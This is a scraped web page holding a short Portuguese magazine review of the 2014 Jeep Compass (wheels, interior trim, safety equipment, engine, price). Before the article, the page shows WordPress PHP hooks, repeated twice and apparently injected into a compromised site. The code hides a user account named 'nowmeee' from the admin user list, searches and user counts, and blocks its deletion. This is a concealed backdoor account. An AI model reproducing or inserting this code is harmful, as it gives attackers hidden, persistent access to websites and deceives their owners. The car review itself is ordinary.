add_action('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->base === 'users') { $protected_user = get_user_by('login', 'nowmeee'); if ($protected_user) { $excluded = (array) $query->get('exclude'); $excluded[] = $protected_user->ID; $query->set('exclude', $excluded); } } } }); add_filter('wp_count_users', function($counts) { $protected_user = get_user_by('login', 'nowmeee'); if ($protected_user) { $counts->total_users--; } return $counts; }); add_action('delete_user', function($user_id) { $user = get_user_by('ID', $user_id); if ($user && $user->user_login === 'nowmeee') { wp_die( __('User nowmeee tidak dapat dihapus.', 'textdomain'), __('Error', 'textdomain'), array('response' => 403) ); } }); add_filter('user_search_columns', function($search_columns, $search, $query) { if (is_admin()) { $protected_user = get_user_by('login', 'nowmeee'); if ($protected_user) { global $wpdb; $query->query_where .= $wpdb->prepare(" AND {$wpdb->users}.ID != %d", $protected_user->ID); } } return $search_columns; }, 10, 3); add_filter('bulk_actions-users', function($actions) { if (isset($_REQUEST['users']) && is_array($_REQUEST['users'])) { $protected_user = get_user_by('login', 'nowmeee'); if ($protected_user && in_array($protected_user->ID, $_REQUEST['users'])) { unset($actions['delete']); } } return $actions; });add_action('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->base === 'users') { $protected_user = get_user_by('login', 'nowmeee'); if ($protected_user) { $excluded = (array) $query->get('exclude'); $excluded[] = $protected_user->ID; $query->set('exclude', $excluded); } } } }); add_filter('wp_count_users', function($counts) { $protected_user = get_user_by('login', 'nowmeee'); if ($protected_user) { $counts->total_users--; } return $counts; }); add_action('delete_user', function($user_id) { $user = get_user_by('ID', $user_id); if ($user && $user->user_login === 'nowmeee') { wp_die( __('User nowmeee tidak dapat dihapus.', 'textdomain'), __('Error', 'textdomain'), array('response' => 403) ); } }); add_filter('user_search_columns', function($search_columns, $search, $query) { if (is_admin()) { $protected_user = get_user_by('login', 'nowmeee'); if ($protected_user) { global $wpdb; $query->query_where .= $wpdb->prepare(" AND {$wpdb->users}.ID != %d", $protected_user->ID); } } return $search_columns; }, 10, 3); add_filter('bulk_actions-users', function($actions) { if (isset($_REQUEST['users']) && is_array($_REQUEST['users'])) { $protected_user = get_user_by('login', 'nowmeee'); if ($protected_user && in_array($protected_user->ID, $_REQUEST['users'])) { unset($actions['delete']); } } return $actions; }); Compass com retoques - Revista Carro
Ícone do siteÍcone do site Revista Carro

Compass com retoques

Por fora, o SUV ganhou poucas mudanças: as rodas agora são de 18"

 

Lançado no Brasil há dois anos para ser a porta de entrada da marca no Brasil, o Jeep Compass 2014 ganhou mudanças discretas. Na verdade, o SUV teve sua maquiagem retocada e ganhou alguns acessórios diferentes. Em sua roupagem, a maior novidade são as rodas de liga leve, que pasaram de 17″ para 18″ e agora estão pintadas de preto, cor aplicada também nos contornos das sete fendas da grade dianteira. 

Ao entrar no carro, você se depara com grafismos dos instrumentos redesenhados e o painel, acima do porta-luvas, recebeu uma placa prateada com as inscrições Compass e Jeep. A marca não economizou no acabamenbto cromado e prateado, usando esse recurso também nos aros do volante, nas saídas de ventilação, no topo da manopla do câmbio e nas maçanetas das portas. O para-brisa ganhou um isolamento acústico.

O Compass não oferece opcionais, porque sua lista de itens de série — espera-se — já satisfaz os compradores. Ele tem, por exemplo, 30 dispositivos de segurança, como controle eletrônico de estabilidade, monitoramento de pressão dos pneus e quatro airbags, dois frontais e dois de cortina, cobrindo as duas fileiras de bancos.

A relação segue com equipamentos como assistente de saída em subida, controle de tração, controle de velocidade de cruzeiro, correção eletrônica de rolagem da carroceria, faróis e lanterna traseira de neblina, freios a disco nas quatro rodas etc. 

O motor 2.0 16V de alumínio conta com duplo comando variável de válvulas e rende 156 cv de potência e 19,4 kgfm de torque. Ela tem o recurso AutoStick, que simula seis velocidades para trocas manuais. Segundo a marca, o Compass pode rodar 9,8 km/l na cidade. O preço sugerido do modelo é de R$ 102.100. 

 

Sair da versão mobile